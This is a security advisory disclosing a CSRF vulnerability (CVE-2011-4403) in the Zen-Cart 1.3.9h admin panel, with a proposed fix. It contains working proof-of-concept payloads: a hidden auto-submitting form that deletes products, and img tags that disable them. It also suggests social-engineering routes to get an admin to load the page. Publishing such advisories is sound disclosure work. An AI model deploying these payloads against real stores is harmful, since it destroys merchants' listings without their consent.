*Advisory Information*

Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products
Date published: 2012-02-10 01:59:45 AM
upSploit Ref: UPS-2011-0018

CVE REF: CVE-2011-4403

*Advisory Summary*

An attacker can force an administrator to delete or disable products from
within his store.

*Vendor*

Zen-Cart

*Affected Software*

Zen-Cart v1.3.9h

Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source
shopping cart software. The ecommerce web site design program is being
developed by a group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design could be and should be done
differently.

*Description of Issue*

This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By
submitting this form from any location an attacker can cause the
administrator to delete / disable products from his store.

*PoC*

Requirements

1. Admin user (target) must have a valid session id. Even if they have
closed the admin window, this attack is still successful
2. The attacker must obtain the admin url
      * Social Engineer an admin user (trick them)
      * Packet Capture
      * Email headers
      * Invoice print out
      * * I know these have been addressed in your security forum topics,
but most users are not aware of these issues
3. The attacker must obtain the product id
      * This is public information
4. The attack must then social engineer (trick them) into loading the page
      * Email with images
      * Post a forum topic with the images
      * Link them to a page on the attacker’s server

Proof of Concept

Delete:

This form can be hidden and made to submit automatically on page load:

<form name="products" action="
http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm"
method="post">
<label for="securityToken">Security Token</label><br/><input type="text"
name="securityToken" value="Can be anything…" /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text"
name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input
type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>

Disable:

<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4
"/>
<img src="
http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5
"/>

Proposed Solution

* Add the security token conditional statement to the
delete_product_confirm.php for all product types
* This should be applied to all requests made within the admin control
panel rather than just key operations

*Credits*

DisK0nn3cT

*References*

http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)

*Patch/Fix*

Update to the latest version